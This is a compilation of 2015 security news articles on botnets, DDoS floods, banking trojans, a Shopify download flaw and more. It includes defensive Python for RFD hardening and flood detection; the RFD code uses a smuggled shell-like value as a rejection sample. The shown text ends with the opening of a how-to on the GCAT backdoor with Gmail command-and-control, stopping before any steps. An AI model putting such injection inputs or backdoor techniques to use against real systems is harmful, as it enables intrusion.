Microsoft Responds To Windows 10 Spying Concerns, But It will Still Collect Your Data

After a number of controversial data mining features and privacy invasions within Microsoft's newest operating system, Microsoft finally broke the ice, almost two months after the launch of Windows 10.
Microsoft has finally responded to the growing privacy concerns around its new operating system to regain the trust of the users who are concerned about their online privacy related to Windows 10.
In a blog post published Monday, Windows chief Terry Myerson describes three ways in which Windows 10 collects and uses its users' data – although he did admit that the OS does regularly phone home by default.
1. Safety and Reliability Data
This data includes anonymous device ID, device type and crash logs. It does not contain any content or files from your computer that directly identifies you.
What else?
Myerson claims that everything Microsoft collects is "encrypted in transit to [its] servers and then stored in secure facilities." Therefore, no one except Microsoft should be able to access it.
2. Personalization Data
This data helps the system learn about your interests and habits in an effort to personalize the Windows experience for you. This data includes Cortana, but Microsoft says it is entirely up to you what data you want it to collect.
However, Myerson does not specify what type of personal information it collects. Does that include browsing history, typed text and spoken commands for Cortana?
Nor does Myerson directly address the concerns that Cortana- and OneDrive-related features keep sending data to Microsoft’s servers even after they are disabled.
3. Advertising Data
Despite serving ads in its products, Microsoft emphasizes that "no matter what privacy options you choose, neither Windows 10 nor any other Microsoft software scans the content of your email or other communications, or your files, in order to deliver targeted advertising to you."
According to Microsoft, two types of data are excluded from ad targeting:
Communications (including e-mail and Skype)
File Contents
However, everything else that the company collects from Cortana, Bing searches or Store purchases could be used to deliver targeted advertisements to you.
Myerson concluded, "Like security, we are committed to following up on all reported issues, continuously probe our software with leading edge techniques, and proactively update supported devices with necessary updates."
He does not answer the one question at the heart of the privacy concern: why is Windows 10 phoning home even when we turn off all data collection and tracking features?
However, Myerson has tried well to reassure Windows 10 users that their personal data is fully secure. And, if any privacy issue is bothering you, you can report it here.

Viruses, bulletins, surveys, and gender: hashtag #VB2015

Mention “Virus Bulletin” to someone who doesn’t happen to be in the information security business, like the Lyft driver who took me to the airport a few days ago, and you realize it can sound like an odd name for an information security conference. However, if you’ve been going to Virus Bulletin for a while – my first time speaking at “VB” was in 1994 – it sounds entirely normal. You know that the name comes from a printed bulletin about developments in the world of computer viruses that first appeared in 1989, mailed by post from Oxfordshire in England. You also know that Virus Bulletin is an excellent conference, one in which serious research is front and center, surrounded by ample opportunities to network with fellow combatants in the fight against malicious code and other cyber-badness.
Virus Bulletin 2015, taking place this week in Prague, is shaping up to be the largest VB yet, and if you’re a regular reader of We Live Security you already know that quite a few folks from ESET are on the conference agenda (thanks to the gracious efforts of my British colleague, David Harley, particularly gracious since he is not actually going to VB this year, taking a break after presenting more than a dozen VB papers since 1997).
Security people problems

I wanted to take a moment to highlight a couple of items at this year’s VB that I think are particularly interesting, starting with the information security skills gap, several aspects of which will be discussed at the VB session which my colleague Lysa Myers and I are hosting on Wednesday. The lack of people with the skills needed to secure today’s increasingly complex and increasingly targeted information systems has been covered before on We Live Security. It intersects with another topic dear to our hearts: diversity in the technology workplace and the opportunities for women in information security roles.
Basically, organizations both public and private can’t find enough people to fill important infosec positions. That is not good for those organizations or society at large. When you get a notice saying your personal information may have been exposed due to a security breach, bear in mind that this could be due to the custodian of that information being under-staffed in the security department, and not necessarily because they weren’t willing to pay good money to hire the right people.
You will notice that I’m using infosec for information security. This is not just to save on keystrokes but also to parallel usage in the latest workforce report from (ISC)², the largest not-for-profit membership body of certified cyber, information, software and infrastructure security professionals worldwide (nearly 110,000 members in 160+ countries). The report, titled Women in Security: Wisely Positioned for the Future of InfoSec, puts a brave face on a depressing statistic: women make up a smaller percentage of the infosec workforce today than they did two years ago (10% today versus 11% in 2013).
On the plus side, there are more women in infosec now because the profession is growing, and the wisdom referenced in the report’s title alludes to the fact that women are making their largest impact in governance, risk and compliance (GRC). The role of GRC is an important and growing one in the information assurance and cybersecurity ecosystem. The report indicates that one out of five women identified GRC as their primary functional responsibility, whereas for men it was one out of eight. Hopefully, this means more women will be in a position to rein in the organizational cyber-risk taking that too often contributes to breaches. I will have a few more words on why that might happen in a moment. You can download the survey report here: Women in Security (PDF).
Surveys and suggestions

Surveys and numbers related to security are something I’ve been studying lately (as in going to school to study, at the University of Leicester in England, virtually speaking). I wrote a paper for this year’s VB proceedings titled “Sizing cybercrime” and will be presenting on that topic. Something I learned while poring over piles of cybercrime statistics is that you should not take them at face value. Very few survey results are presented with an appropriate level of transparency. For example, in your efforts to decide where to prioritize your organization’s security spending you might read a report that seems to offer a representative sample of security incident data from 500 companies. But in reality the data could come from far fewer than 500 firms and be supplied by people with an agenda, reported by an entity with an axe to grind or a product to sell. As for what constitutes a “security incident”, who knows? Many surveys that have reported numbers for these are very vague about what exactly they are.
For a taste of what is wrong with the current state of measuring cybercrime consider this: governments are not making the same effort to report cybercrime as they do ‘traditional’ crime. Want stats on car thefts and bank robberies? Sure, the government has been keeping fairly consistent longitudinal data sets documenting those crimes. Want to know how much cybercrime companies in America have to deal with and what it costs them? Sorry, you’ll have to ask a company that sells security services. Unless you are okay with data from 10 years ago, which is when the U.S. federal government made its one and only attempt to measure those things (in response to my inquiries, I was told it has no plans to try that again).
A lack of crime data is not just annoying to academic criminologists. Consider the two main inputs you need for risk management, bearing in mind that for many organizations risk management of information systems is required by law or regulation. You need to input the likelihood or probability of an adverse event and the impact of the event, in other words, frequency and cost. Good luck trying to get an objective read on either from the current crop of cybercrime statistics.
So instead of quantitative inputs you have to use qualitative measures, which are subjective and thus open to cultural bias. And that brings me to a couple of papers that are not being presented at VB but you may still find stimulating:
‘Trust, emotion, sex, politics, and science: surveying the risk-assessment battlefield’ by Slovic, P. (1999) Risk analysis, 19(4): 689-701 (link is to PDF file).
‘Gender, race, and perceived risk: The “white male” effect’ by Slovic, P., Flynn, J., Finucane, M.L., Satterfield, T.A. and Mertz, C.K. (2000) Health, Risk & Society, 2(2): 159-172 (you may need to go to the library for this one).
Reading these will acquaint you with the cultural theory of risk perception and a fascinating discovery which that theory facilitated. It turns out that one group of people consistently ranks risks lower than the rest of the population, namely: white males. The so-called “White Male Effect” has been discerned in numerous studies where people rate the “riskiness” of different activities and technologies. In other words, white males are less likely to say: don’t do that, it’s too risky. This effect was found to persist even when all of the participants were well-educated scientists. And of course, we all know that in the U.S. and many European countries white males are massively over-represented in management roles; for example, 98% of CEOs and 97% of general and operational managers in the U.S. are male, and only 2.5% are non-white (see 2014 BLS stats).
However, it is also true that in countries like the U.S. most of the information security professionals – the people whose warnings about cyber risks presumably went unheeded by management – are white males (90% according to the report cited earlier). A possible explanation is offered by further cultural theory research which indicates that a particular subset of white males – about 30% – consistently judge risks to be extremely low, skewing the overall male riskiness score. Could those be the guys running the companies that are not taking cyber risks seriously enough? And will the influx of women into GRC change the outcome of risk management meetings? Please stay tuned!

Linux XOR DDoS Botnet delivers potent DDoS attacks

Experts at Akamai discovered the Linux XOR DDoS Botnet, a malicious infrastructure used to run potent DDoS attacks against dozens of targets.
Security researchers have discovered a Linux botnet, dubbed XOR DDoS or Xor.DDoS, that is targeting gaming and education websites with potent DDoS attacks which reached 150 gigabytes per second of malicious traffic.

According to an advisory published by the content delivery network Akamai Technologies, the XOR DDoS botnet has targeted at least 20 websites each day, nearly 90 percent of the targets are located in Asia.

“Akamai’s Security Intelligence Response Team (SIRT) is tracking XOR DDoS, a Trojan malware attackers are using to hijack Linux machines to include within a botnet for distributed denial of service (DDoS) campaigns. To date, the bandwidth of DDoS attacks coming from the XOR DDoS botnet has ranged from a few gigabits per second (Gbps) to 150+ Gbps. The gaming sector is the primary target, followed by educational institutions. Akamai SIRT released a threat advisory this morning authored by Security Response Engineer Tsvetelin “Vincent” Choranov.” states the advisory.


“In short: Xor.DDoS is a multi-platform, polymorphic malware for Linux OS, and its ultimate goal is to DDoS other machines,” reported a post published by the Blaze Security blog. “The name Xor.DDoS stems from the heavy usage of XOR encryption in both malware and network communication to the C&Cs (command and control servers).”
The researchers observed that the attackers disguise the IP addresses of the machines involved in the DDoS attack; in some cases they used IP spoofing techniques to make it harder for victims to defend their infrastructure from the attack.

The experts discovered that the XOR DDoS attacks rely on Linux machines that were compromised by cracking weak passwords used to protect the command shell.

Once the attackers have obtained access to the Linux machine, they use root privileges to launch a script that downloads and executes a malicious binary file.

“XOR DDoS is an example of attackers switching focus and building botnets using compromised Linux systems to launch DDoS attacks. This happens much more frequently now than in the past, when Windows machines were the primary targets for DDoS malware.” explained Stuart Scholly, senior vice president and general manager of Akamai’s Security Business Unit.

XOR DDoS isn’t the only recently discovered botnet composed of Linux systems; other examples of Linux-based malware include the Spike DDoS toolkit and the IptabLes and IptabLex malware that last year targeted Linux servers to run large-scale DDoS attacks.

“There are an increasing number of Linux vulnerabilities for malicious actors to target, such as the heap-based buffer overflow vulnerability found earlier this year in the GNU C library. However, XOR DDoS itself does not exploit a specific vulnerability.” explained the advisory published by Akamai.

Pirate Bay co-founder Gottfrid Svartholm, aka Anakata, Released from Prison
Gottfrid Svartholm Warg, the co-founder of the notorious file-sharing website The Pirate Bay, has been released from a Swedish prison after three years behind bars for hacking and copyright offenses.
Yes, Svartholm Warg, also known as Anakata, is a free man again.
Svartholm was convicted on both Swedish copyright offences and Danish hacking conspiracy connected to The Pirate Bay.
The news comes just a few months after the third and last founder of The Pirate Bay, Fredrik Neij (also known as TiAMO), was released from a Swedish prison after serving his 10-month prison sentence.
Svartholm has not yet made any public statements following his release from a Swedish prison on Saturday. His release was reported by Swedish newspaper Dagens Nyheter.
However, the release was confirmed by Warg's mother Kristina Svartholm on Twitter.
"Yes, #anakata is free now. No more need to call for #freeanakata. Thank you everyone for your important support during these three years!"
Svartholm was arrested in his Cambodian apartment in September 2012 and extradited to Sweden in November 2013, where he served a sentence for copyright offences. In November 2013, he was finally extradited to Denmark to face charges in the CSC hacking cases.
Once the world's most popular file-sharing website, The Pirate Bay predominantly used to share copyrighted material, such as pirated software, video files and other stuff, free of charge.
Despite the criminal convictions and numerous takedowns in police raids, the Pirate Bay continues to operate, although it has moved to different Web domains several times.

JavaScript DDoS Attack Peaks at 275,000 Requests-Per-Second

Two years ago at the Black Hat conference, WhiteHat Security researchers Jeremiah Grossman and Matt Johansen explained how hackers could in theory leverage an online ad network to distribute malicious JavaScript efficiently and quickly.

Depending on how much money the attacker wanted to spend, they could do just about anything from drive-by download attacks, to search engine poisoning to DDoS attacks.

“For a DDoS attack, for mere dollars we could bring down one Apache server very quickly for probably under $10 and hold it down for a long time,” Grossman told Threatpost in 2013. “I don’t know if it has good DDoS protection how much it would cost us, but it probably wouldn’t cost $100. This means that anyone without DDoS protection is susceptible to a $10 attack that could bring them down.”

Using JavaScript to bring down a target has slowly moved out of the theoretical, given the Great Cannon research done earlier this year by Citizen Lab and a JavaScript-based DDoS attack against 8chan that originated in malicious image files hosted on Imgur. CloudFlare on Friday described a voluminous attack against an unnamed customer that it speculates could have been launched using a mobile ad network.

Researcher Marek Majkowski said the flood attacks peaked at 275,000 HTTP requests per second, close to 1.2 billion requests per hour, during a four-hour span. Most of the requests came from mobile browsers based in China.

“There is no way to know for sure why so many mobile devices visited the attack page, but the most plausible distribution vector seems to be an ad network,” Majkowski wrote. “It seems probable that users were served advertisements containing the malicious JavaScript. [These] ads were likely showed in iframes in mobile apps, or mobile browsers to people casually browsing the internet.”

Majkowski said this was not a packet-injection type of attack. Instead, it’s likely that users’ mobile browsers were served iframes with ads requested from a mobile ad network. The networks forwarded the requests to the malicious third parties which won the real-time bidding for the slot. The user was served a page containing malicious JavaScript that sent a flood of XHR requests against the targeted website, CloudFlare said.

“It seems the biggest difficulty is not in creating the JavaScript — it is in effectively distributing it. Since an efficient distribution vector is crucial in issuing large floods, up until now I haven’t seen many sizable browser-based floods,” Majkowski said. “Attacks like this form a new trend. They present a great danger in the internet — defending against this type of flood is not easy for small website operators.”

Vulnerable medical equipment details disclosed online

Security researchers have discovered that vulnerabilities in thousands of critical medical systems have been disclosed online.
The Register reported that Scott Erven, from Protiviti, and Mark Collao, from NeoHapsis, found that many of these machines are at serious risk of being easily exploited by attackers.
One particularly severe example documented by the experts concerned a “very large” US healthcare organization, whose name remains undisclosed for obvious reasons.
Through Shodan, which describes itself as “the world’s first computer search engine that allows you to search the internet for computers”, they found that up to 68,000 of its medical systems had been revealed.
The fact that thousands of other institutions have similarly had their vulnerable equipment effectively put on display suggests that this is an important and timely finding.
“Once we start changing [Shodan search terms] to target speciality clinics like radiology or podiatry or paediatrics, we ended up with thousands with misconfiguration and direct attack vectors,” Mr. Erven told the online news provider.
“Not only could your data get stolen but there are profound impacts to patient privacy.”
Mr. Collao added that cybercriminals with access to such information could theoretically generate comprehensive intelligence on healthcare organizations.
So detailed could such insight be that they could even know on which floor certain types of equipment and computers were located.
He commented that part of the vulnerability associated with medical-specific machines is down to their dated operating system.
Many are still using older versions of Windows, such as the now discontinued XP, which leaves them open to multiple attacks.
This is an apparently widespread problem in medical spheres, as WeLiveSecurity documented last month.
The security blogger Graham Cluley commented: “In short, if you’re still running Windows XP you’re not just taking an enormous risk, you’re being – in my opinion – negligent.”
For more detail, please check out the video below, which is of the presentation that Mr. Erven and Mr. Collao gave on their findings.

Shifu banking trojan is officially spreading to the UK

The researchers at Security Intelligence announced that the Shifu banking trojan is officially spreading to the UK, targeting banks and wealth management firms.
A few weeks ago researchers at Security Intelligence announced the discovery of the sophisticated banking Trojan Shifu; the malicious code has been used to target the customers of more than a dozen Japanese banks. Shifu is considered by the experts an advanced threat, suspected to have been developed by Russian-speaking authors who borrowed features from several well-known banking trojans, including the popular Zeus VM and Dridex.

Shifu infections

The Shifu banking trojan was designed to defraud e-banking users by stealing their credentials and digital certificates; it is also able to scrape banking app authentication tokens and exfiltrate data from smart cards connected to the infected machine.

The Shifu banking Trojan also targets digital signature credentials issued to business users by certification authorities; the malware authors harvest them to impersonate victims and sign documents on their behalf.

The experts predicted a rapid diffusion of Shifu and, unfortunately, they were right: Shifu has spread from Japan and begun actively attacking UK banks and wealth management firms.

“X-Force researchers confirmed that Shifu is actively attacking online banking customers in order to perform fraudulent transactions. The Shifu Trojan may be new crimeware, but its inner workings are not entirely unfamiliar. The malware relies on a few tried-and-true Trojan mechanisms from other infamous crimeware codes. It appears that Shifu’s internal makeup is being composed by savvy developers who are intimately familiar with other types of banking malware.” states the post published by Security Intelligence.

The authors of the malware have introduced specific features to target users in the UK: the sample detected by the experts in the country no longer injects malicious code into the explorer.exe process, but instead launches a new svchost instance and performs all actions from that process.

Shifu began spreading to UK targets in mid-September 2015, initially only a few machines were infected by the banking trojan, but by Sept. 22 hundreds of endpoints were compromised per day.

“Although one relatively modest campaign has already taken place, IBM X-Force researchers believe more widespread infection sprees are yet to come in the U.K. This is likely to be followed with future propagation into other parts of Europe and the U.S.”

The threat actor behind the Shifu campaign is using a variant of the Angler EK, which has been offered for sale in the underground since 2013.

The researchers observed that the infection process relies on compromised websites hosting the popular Angler exploit kit, while the initial attack vector is spam email.

“Although Angler is used by many cybercriminals, they all rely on its ability to evade security mechanisms and its multistep attack technique. To keep automated security off its tracks, Angler attacks are based on a redirection scheme that begins with a clean page or advertising banner and eventually lands on an Angler-poisoned page. The victim’s endpoint is then scanned for the corresponding vulnerabilities, followed by exploitation and the eventual payload drop.” states Security Intelligence.

The Shopify commerce platform is open to RFD attacks

The researcher David Sopas at WebSegura discovered a Reflected Filename Download vulnerability in the popular multi-channel commerce platform Shopify.
Shopify is a multi-channel commerce platform that helps people sell online, in-store, and everywhere in between. The well-known security researcher David Sopas at WebSegura discovered a Reflected Filename Download vulnerability in the Shopify service. Sopas already sent a security report to Shopify explaining that exploiting it does not require any authentication such as an access_token, an api_key or even a Shopify account.

The Reflected Filename Download vulnerability affects the service: the expert explained that opening the proof-of-concept link in Internet Explorer 8 and 9 shows a download dialog with a file named track.bat. If the user launches the batch file, it runs Google Chrome with a web page chosen by the attacker; in this specific case the page just displayed a text, but it is clear that a bad actor could exploit it to carry out malicious activities.

Sopas observed that on other browsers, such as the latest versions of Chrome, Opera, Firefox, Android Browser and Chrome for Android, the user needs to visit a web page that forces the download by using the HTML5 <a download> attribute.


“When the victim visits a specially crafted page with the code above and clicks the image it will show the download dialog and after downloading it will show that the file is coming from Shopify servers.” states Sopas in a blog post.
Reflected Filename Download attacks are very insidious because victims usually don’t suspect that they have been targeted: the malicious file they receive appears to be offered for download by a trusted source, in this case the Shopify website.


To sum up, a possible attack scenario is:

The attacker sends a link to the victim, as it would with a CSRF or an XSS (phishing campaigns, social networks, instant messengers, posts, etc.)
The victim clicks the link because it trusts Shopify as the source and downloads the file.
Once the file is executed, the victim is hijacked.
Sopas criticized the approach of Shopify, which underestimated the security issue, as is visible in the timeline he published.
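The server-side fix for the scenario above, as an added example that is not Sopas's or Shopify's code: the endpoint whitelists whatever it reflects and pins the download filename, so the browser never saves the reply under an attacker-chosen name like track.bat. It assumes the reflected value is a JSONP-style callback name (the post does not say which Shopify parameter was reflected); the filename and sample data are constructed.

```python
"""Added example, not Sopas's or Shopify's code: hardening a JSON/JSONP
endpoint against Reflected Filename Download (RFD).

Assumed detail: the endpoint reflects a caller-supplied callback name into
its body. Two controls together break the attack chain described above:
  1. the reflected value is whitelisted, so shell-like text such as
     'x||echo hello' never reaches the response body;
  2. Content-Disposition pins a fixed filename, so neither a crafted URL path
     nor an HTML5 download attribute can make the browser save the reply
     as a .bat or similar executable name."""
import json
import re

CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]{0,63}$")  # plain JS identifier
FIXED_FILENAME = "response.json"  # constructed; any fixed, harmless name works


def unsafe_json_response(data, callback=None):
    """The pattern RFD abuses: the callback is reflected verbatim and the
    browser is left to pick the download filename from the URL."""
    headers = {"Content-Type": "application/json; charset=utf-8"}
    body = json.dumps(data, separators=(",", ":"))
    if callback is not None:
        body = f"{callback}({body});"
    return 200, headers, body


def safe_json_response(data, callback=None):
    """Hardened variant: whitelist the reflected value, force the filename,
    and stop MIME sniffing. Raises ValueError on a callback that is not a
    plain identifier, so nothing attacker-shaped is ever echoed back."""
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        # The filename part is what defeats RFD: the browser keeps this name
        # regardless of how the request URL was crafted.
        "Content-Disposition": f'attachment; filename="{FIXED_FILENAME}"',
    }
    body = json.dumps(data, separators=(",", ":"))
    if callback is None:
        return 200, headers, body
    if not CALLBACK_RE.match(callback):
        raise ValueError("callback must be a plain JavaScript identifier")
    headers["Content-Type"] = "application/javascript; charset=utf-8"
    return 200, headers, f"{callback}({body});"


if __name__ == "__main__":
    print(safe_json_response({"ok": True}, "handleData"))
    try:
        safe_json_response({"ok": True}, "x||echo hello")
    except ValueError as err:
        print("rejected:", err)
```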

“In my opinion this was the last time I’ll send anything to Shopify. We have different views on patching security reports.
An example: Some of the bounties that they already paid on HackerOne are Self-XSS and Missing SPF. Both issues were awarded with the minimum amount – $500. I don’t know where or why these issues are more dangerous than my security report but it’s up to them.
I was patient and gave them enough time to fix this issue – even sending them possible solutions. More than 6 months on a paid online store service and still unfixed seems too much. So beware of this issue because according to Shopify they don’t foresee that this issue will be fixed any time soon.” wrote Sopas.

19-03-2015 Reported this security issue to Shopify
27-03-2015 No reply so I asked for an update
06-04-2015 First contact with Shopify which they reply that it’s being processed
15-04-2015 Shopify told me that this security issue is interesting and ask for more information
15-04-2015 I sent more information and new proof-of-concept
04-05-2015 I asked for an update (no reply)
15-06-2015 I asked for another update (no reply)
16-09-2015 I asked for another update
22-09-2015 Since April without any email from Shopify they replied that they were working on fixing more urgent issues and consider mine a low impact and low priority
23-09-2015 I told them that it’s not a social engineering issue but they still don’t understand it
23-09-2015 Shopify told me that their prioritization is not up for discussion and not patching any time soon.

Virus disguised as an educational game. Up to half a million devices could have been infected

29.9.2015 Mobile

The BrainTest app on Google Play contained malware.
Up to 500,000 devices were infected with a dangerous virus after their users downloaded the seemingly innocuous educational game BrainTest. Security experts from Check Point revealed last week that malicious code had been bundled with the game.
The cybercriminals managed to infect such a large number of smartphones and tablets only because they were able to smuggle the app, together with the virus, onto the official Google Play store. They thereby managed to fool the security system that checks whether programs are malicious.

“According to Google Play statistics, the number of downloads was between 100,000 and 500,000 each time. The large number of downloads means the malware was on Google Play for an extended period and attests to advanced attack methods capable of hiding the malicious code even from the various security techniques Google uses to detect threats,” said Check Point media representative Petr Cícha.

Removing the malicious code that was installed along with the BrainTest game from a device is not at all easy. The malware is able to escalate its privileges on infected devices, which allows it to remain on the device even after the user tries to uninstall it.

“In the past month Check Point has uncovered two dangerous apps on Google Play, which proves that downloading an app from an official and trusted store does not mean the app is safe,” Cícha added.

Fortinet unveils cloud-based security for corporate Wi-Fi

29.9.2015 Security
Fortinet announced new features of its FortiCloud cloud management system and a new line of cloud-managed wireless access points for WLANs. According to its representatives, it offers the highest level of wireless network security on the market today.

The FortiAP-S series wireless access points make it possible to dispense with separate WLAN controllers without exposing the network to cyber threats.

Each access point is centrally managed through the FortiCloud cloud system, which according to the vendor allows easy deployment and administration, provides better control and simplifies the infrastructure overall.

It also allows management to scale flexibly with the size of the network, making it suitable for distributed enterprises with operations or branches in many locations.

FortiAP-S includes features such as intrusion prevention, web filtering, rogue access point detection, antivirus protection, granular application control and more.

These functions are complemented by continuously updated threat intelligence from FortiGuard Labs. Every FortiAP-S access point is thus said to be protected in real time against the latest security threats.

“Specific security policies for mobile devices, application access control and antivirus protection including updates can now be applied directly in the access points, giving customers an additional layer of protection for environments where employees use personal devices for work purposes,” adds Ondřej Šťáhlavský, Fortinet’s regional director for Central and Eastern Europe.

Mobile Ad Network exploited to run a major DDoS Attack

Security experts at CloudFlare observed a major DDoS attack against one of their customers that appeared to leverage a mobile ad network.
CloudFlare revealed that one of its customers was recently hit by a distributed denial-of-service (DDoS) attack that appeared to leverage a mobile ad network and malicious JavaScript.

The experts explained that the DDoS attack relied on JavaScript that generates legitimate-looking HTTP requests.

The possible exploitation of ad network was discussed two years ago at the Black Hat conference by the experts Jeremiah Grossman and Matt Johansen.

Unfortunately, this kind of DDoS attack is becoming popular in the hacking community. In April, security researchers from the University of California at Berkeley and the University of Toronto uncovered a powerful weapon in the Chinese Government's cyber arsenal, dubbed the Great Cannon, used to hit websites with powerful DDoS attacks. The Great Cannon has been used by Chinese authorities to knock out two anti-censorship GitHub pages, and it can also be used as a hacking tool to silently install malware on the targeted machine.

The experts explained that the Great Cannon relies on malicious JavaScript injected into unencrypted traffic in order to carry out DDoS attacks.

Another similar DDoS attack was uncovered last week, when experts at Imgur discovered that a vulnerability in the platform had been exploited by attackers to target the imageboards 4chan and 8chan.

Now, CloudFlare noticed a large number of HTTP requests addressed to one of its customers' websites; the DDoS attack peaked at over 1 billion requests per hour. The experts observed a total of 4.5 billion requests reaching the content delivery network's servers on the day of the attack.

DDoS attack log

The overall number of unique IP addresses originating the requests was 650,000; 99.8 percent of these addresses belong to China.

Experts at CloudFlare discovered that nearly 80 percent of the requests originated from mobile devices (mobile apps and browsers commonly used by Chinese users).

“Attacks like this form a new trend,” states a blog post published by CloudFlare. “They present a great danger in the internet — defending against this type of flood is not easy for small website operators.”

“There is no way to know for sure why so many mobile devices visited the attack page, but the most plausible distribution vector seems to be an ad network,” wrote CloudFlare researcher Marek Majkowski. “It seems probable that users were served advertisements containing the malicious JavaScript. [These] ads were likely showed in iframes in mobile apps, or mobile browsers to people casually browsing the internet.”

The experts discovered that the websites in the “Referer” header pointed to an ad aggregator or a link farm. The DDoS attack relied on JavaScript hosted on these pages that was able to generate a large number of XMLHttpRequest (XHR) requests.

CloudFlare researchers ruled out the possibility that the DDoS attack was conducted by injecting TCP packets, as observed in the DDoS attack conducted by the Great Cannon.

CloudFlare provided the following description for the attack scenario:

A user was casually browsing the Internet or opened an app on the smartphone.
The user was served an iframe with an advertisement.
The advertisement content was requested from an ad network.
The ad network forwarded the request to the third-party that won the ad auction.
Either the third-party website was the “attack page”, or it forwarded the user to an “attack page”.
The user was served an attack page containing a malicious JavaScript which launched a flood of XHR requests against CloudFlare servers.
“It seems the biggest difficulty is not in creating the JavaScript — it is in effectively distributing it. Since an efficient distribution vector is crucial in issuing large floods, up until now I haven’t seen many sizable browser-based floods,” Majkowski added.
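From the defender's side, the scenario above leaves a recognisable footprint in ordinary web server logs: one path hammered over and over, an unusually high share of mobile user agents, and Referer headers that concentrate on a few third-party ad pages. The following is an added example (not CloudFlare's code) that profiles constructed combined-format log lines for exactly those three skews; the thresholds and the hostnames are assumptions.

```python
"""Profile web-server log lines for the fingerprints of a browser-based XHR flood.

Added example for the CloudFlare write-up above; it is not CloudFlare's code. It looks for the
signals the article describes: one path hit repeatedly, a very high share of mobile user
agents, and Referer headers that concentrate on a few third-party (ad aggregator) pages.
The log lines are constructed, in Apache/nginx combined format.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Coarse mobile detection; enough to reproduce the "share of mobile clients" figure.
MOBILE_UA = re.compile(r"Android|iPhone|iPad|Mobile", re.I)

# Constructed sample: four requests driven from ad/link-farm pages on phones, one normal visit.
SAMPLE_LOG = """\
203.0.113.10 - - [21/Sep/2015:10:00:01 +0000] "GET /api/ping?x=1 HTTP/1.1" 200 12 "http://ads-aggregator.example/landing" "Mozilla/5.0 (Linux; Android 4.4; MI 3) AppleWebKit/537.36 Mobile Safari/537.36"
203.0.113.11 - - [21/Sep/2015:10:00:01 +0000] "GET /api/ping?x=2 HTTP/1.1" 200 12 "http://ads-aggregator.example/landing" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) Mobile/12H143"
203.0.113.12 - - [21/Sep/2015:10:00:02 +0000] "GET /api/ping?x=3 HTTP/1.1" 200 12 "http://linkfarm.example/page" "Mozilla/5.0 (Linux; Android 5.0; SM-G900F) Mobile Safari/537.36"
203.0.113.10 - - [21/Sep/2015:10:00:02 +0000] "GET /api/ping?x=4 HTTP/1.1" 200 12 "http://ads-aggregator.example/landing" "Mozilla/5.0 (Linux; Android 4.4; MI 3) AppleWebKit/537.36 Mobile Safari/537.36"
198.51.100.7 - - [21/Sep/2015:10:00:02 +0000] "GET /blog/post HTTP/1.1" 200 5120 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) Firefox/40.0"
"""


def parse_log(text):
    """Parse combined-format lines; unparseable lines are skipped rather than aborting the run."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def profile(records):
    """Summarise the traffic along the dimensions this kind of flood distorts."""
    total = len(records)
    if total == 0:
        return {"total": 0, "unique_ips": 0, "mobile_share": 0.0,
                "top_referer_host": None, "top_referer_share": 0.0, "top_path_share": 0.0}
    # Referer hosts: a flood served through ads concentrates on the ad aggregator / link farm.
    referers = Counter(urlsplit(r["referer"]).netloc
                       for r in records if r["referer"] not in ("", "-"))
    # Paths without the query string: the XHR loop hits one endpoint with varying parameters.
    paths = Counter(r["path"].split("?", 1)[0] for r in records)
    top_ref, top_ref_n = referers.most_common(1)[0] if referers else (None, 0)
    return {
        "total": total,
        "unique_ips": len({r["ip"] for r in records}),
        "mobile_share": sum(1 for r in records if MOBILE_UA.search(r["ua"])) / total,
        "top_referer_host": top_ref,
        "top_referer_share": top_ref_n / total,
        "top_path_share": paths.most_common(1)[0][1] / total,
    }


def is_xhr_flood(p, min_mobile=0.7, min_referer_share=0.5, min_path_share=0.5):
    """All three skews together match the article's pattern; any one alone is ordinary traffic."""
    return (p["mobile_share"] >= min_mobile
            and p["top_referer_share"] >= min_referer_share
            and p["top_path_share"] >= min_path_share)


if __name__ == "__main__":
    summary = profile(parse_log(SAMPLE_LOG))
    print(summary, "flood" if is_xhr_flood(summary) else "normal")
```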

New malware from Google Play may have infected up to a million devices

Check Point published information about a new piece of malicious code that appeared in Google Play. According to the company, its authors hedged their bets and placed the malicious code in the store twice.

According to Check Point, the malicious code was attached to the game BrainTest, and the game was hosted on Google Play servers twice. According to the store operator's statistics, the number of downloads was between 100,000 and 500,000 each time.

The large number of downloads thus means that the malware was on Google Play for a long time, and it testifies to advanced attack methods capable of hiding the malicious code even from the various security techniques Google uses to detect threats.

What is said to be interesting about this malware is that it tried to escalate its privileges. To do this, it installed a rootkit on the device, which allowed the malicious code to remain on the device even after the user tried to uninstall it.

The activities the malware performs include displaying unwanted advertisements on the screen and installing additional programs capable of stealing sensitive data from the affected mobile device.

Over the past month, Check Point says it has uncovered two dangerous applications on Google Play, which proves that even downloading an application from an official and trusted store does not mean the application is safe. Threats are said to be increasingly sophisticated and try to bypass existing security mechanisms.

How to use GCAT backdoor with Gmail as a C&C server

The GCAT backdoor is a fully featured backdoor that can be controlled by using Gmail as a Command & Control server, with multiple advantages for attackers.
Establishing a backdoor is one of the main goals for an attacker in order to gain persistence on the targeted machines. There are many hacking tools that make it easy to create backdoors; many of these tools are used daily by professional penetration testers when they try to compromise a target or to maintain full control over it.

The creation of a backdoor allows an attacker to connect to the victim's machine in order to send and execute commands, send and manipulate files, and access the administrative settings of the system.

Today I want to present GCAT, a fully featured backdoor that can be controlled by using Gmail as a Command & Control server; this means that the attacker can send instructions to the remote system through a Gmail account.

As you can easily imagine, this feature is very important because it helps keep the backdoor hidden, evading classic detection mechanisms based on traffic analysis.

Traffic to a Gmail account will never raise suspicions among the administrators of a network and will never trigger any alarm; also consider that the command and control infrastructure will always be up and reachable, a vital factor for a botmaster.

The code for the GCAT backdoor is available on GitHub; the repository includes two files: a script used to enumerate and send commands to the bots, and the backdoor itself.
Both files include the gmail_user and gmail_pwd variables, which must be edited with the username and password of the Gmail account used as the C&C server.

GCAT backdoor

To carry out an attack based on the GCAT backdoor, an attacker has to complete the following steps:

